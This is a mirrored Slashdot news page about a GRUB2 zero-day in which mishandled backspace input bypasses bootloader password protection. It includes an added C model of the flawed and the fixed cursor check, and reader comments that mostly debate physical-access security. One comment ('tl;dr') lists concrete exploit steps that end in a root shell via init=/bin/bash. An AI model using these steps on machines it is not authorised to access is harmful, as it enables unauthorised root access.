Slashdot Mirror


0-Day GRUB2 Authentication Bypass Hits Linux (hmarco.org)

prisoninmate writes: A zero-day security flaw was discovered by developers Ismael Ripoll and Hector Marco in the upstream GRUB2 packages. GRUB2 did not correctly handle the backspace key when the bootloader was configured to use password protected authentication, thus allowing a local attacker to bypass GRUB's password protection. Versions from 1.98 (December, 2009) to 2.02 (December, 2015) are affected. At the moment, it looks like only a few distributions received the patched GRUB2 versions, including Ubuntu, Debian (Squeeze LTS only) and Red Hat Enterprise Linux 7.
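
An added illustration, not part of the original submission and not GRUB's code: a small C model of a prompt line editor showing why backspace on an empty field needs a lower-bound check. It assumes the mishandling is an unsigned cursor decremented without that check; `edit_line`, `backspaces_then_name` and the 16-byte field are hypothetical names and sizes chosen here.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define FIELD_LEN 16              /* constructed size, not GRUB's */

struct result { size_t cur; size_t oob; char buf[FIELD_LEN]; };

/* Model of a prompt's line editor. '\b' is backspace, anything else is a
 * typed character. checked == 0 reproduces the flawed pattern: the unsigned
 * cursor is decremented even when the field is already empty. */
static struct result edit_line(const char *keys, size_t n, int checked)
{
    struct result r;
    memset(&r, 0, sizeof r);
    for (size_t i = 0; i < n; i++) {
        if (keys[i] == '\b') {
            if (checked && r.cur == 0)
                continue;             /* hardened: nothing to erase */
            r.cur--;                  /* unchecked: wraps past zero */
            if (r.cur < FIELD_LEN)
                r.buf[r.cur] = '\0';
            else
                r.oob++;              /* model counts the stray write instead of doing it */
        } else if (r.cur < FIELD_LEN - 1) {
            r.buf[r.cur++] = keys[i];
        }
    }
    return r;
}

/* Constructed input: `count` backspaces on an empty field, then "root". */
static struct result backspaces_then_name(size_t count, int checked)
{
    char keys[64];
    if (count > sizeof keys - 4)
        count = sizeof keys - 4;
    memset(keys, '\b', count);
    memcpy(keys + count, "root", 4);
    return edit_line(keys, count + 4, checked);
}

int main(void)
{
    struct result bad = backspaces_then_name(28, 0);
    struct result ok = backspaces_then_name(28, 1);
    printf("unchecked: cursor=%zu stray_writes=%zu\n", bad.cur, bad.oob);
    printf("checked:   cursor=%zu name=%s\n", ok.cur, ok.buf);
    return 0;
}
```

With the check in place the 28 backspaces are ignored and the field ends up holding the typed name; without it the cursor wraps to a huge value and every later access through it falls outside the field.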

12 of 144 comments

  1. News for nerds? by Anonymous Coward · · Score: 4, Insightful

    Is this even an issue?

    It's a password on the boot loader. It's not encrypting anything. If anyone is in the position to interact with a machine before the OS has loaded, they've probably got enough access to it that they can do whatever the hell they want, including booting the system off alternative media and replacing or reconfiguring said boot loader.

    1. Re:News for nerds? by JackieBrown · · Score: 3, Insightful

      Then why offer a password on a bootloader?

    2. Re:News for nerds? by i.r.id10t · · Score: 4, Insightful

      I can see where a boot password would be handy for a kiosk or similar setup where the machine is out in public space, and I'd definitely want it locked down to some degree. BIOS boot options as well.

      For a server room, this is no big deal.

      --
      Don't blame me, I voted for Kodos
    3. Re:News for nerds? by segedunum · · Score: 4, Insightful

      It's news, but it's not as big as many people think. When someone can physically get to your machine you're going to need an awful lot more than a bootloader password to secure things.

  2. This is not security by Froze · · Score: 4, Insightful

    In the majority of cases if you are interacting with the boot process then you have physical access to the machine. So unless GRUB is managing disk encryption you have access regardless of the password in GRUB. This is security theater, not real security and breaking it is not accomplishing anything significant.

    Next Story.

    --
    -- The morphemes of your disquisition are ascertainable, but they have eschewed an ambit of transpicuous exposition.
  3. What about systemd-grub? by Anonymous Coward · · Score: 5, Funny

    The new systemd-grub leverages a pre-boot, machine-level dbus interface to policy-kit and systemd-logind, which will handle this for you. Why are people still in the dark ages with bootloader passwords?

  4. Yawn.... by Lumpy · · Score: 3, Insightful

    If someone has local access, they OWN the machine already. This is a minor inconvenience as zero security is given with a grub password anyways.

    --
    Do not look at laser with remaining good eye.
  5. Re:.04 versions? by spirtbrat · · Score: 3, Informative

    It's a boot loader. And as boot loaders go, GRUB2 is already packed with features. What more do you expect it to be developed?

  6. Re:Slackware for the win by Viol8 · · Score: 3, Informative

    Sadly, Slackware also appears to be slowly winding down. Sure, it's still being updated on an ad hoc package-by-package basis, but there hasn't been a full distro release for 2.5 years now. That's not a good sign.

  7. Re:Of course this is security by Anonymous Coward · · Score: 3, Interesting

    What if you can't take the machine apart inconspicuously because the case is sealed. What if you have only 3 minutes before someone else comes by? Security is not black and zero at all.

    That is like the most contrived example ever. Perhaps you shouldn't take use cases from Hollywood flicks?
    We are talking about the boot process; the computer wouldn't be shut down if the user was away for three minutes.
    A more realistic scenario would be a laptop left in a hotel room, and an option would be to just steal the laptop and have all the time in the world.

  8. tl;dr by SharpFang · · Score: 3, Informative

    press backspace 28 times [enter]
    write_word 0x7eb514e 0x90909090[enter]
    normal[enter]
    Enter 'edit mode'
    append init=/bin/bash to the linux entry
    F10

    --
    45 5F E1 04 22 CA 29 C4 93 3F 95 05 2B 79 2A B2
  9. Re:Slackware for the win by DarkOx · · Score: 3, Informative

    Slackware is not winding down. There has not been a release because there has been little reason for one. With so much in flux (systemd, X/Wayland, GCC 5 stabilizing, and XFCE, Slackware's 2nd of 2 DEs, having only recently had a major release itself), 14.1 has aged well. I think figuring out where udev/eudev were going also has held things up a bit.

    The changelog has been very active the past couple months. Patrick is making noise about 'betas' etc and the other developers like Robby and Eric are also hinting. A new release is coming.

    What you have to realize about Slackware is, releases are not done for their own sake. They are done for the sake of major changes and improvements. Slackware only implements major changes / forklifts when it's clear they won't be walking back those changes or replacing them again with something else in the near future. Slackware really takes stability and consistency very, very seriously.

    The 'faster' things move in the Linux ecosystem, the longer the Slackware team has to wait for the dust to settle.

    --
    Repeal the 17th Amendment TODAY! Also Please Read http://www.gnu.org/philosophy/right-to-read.html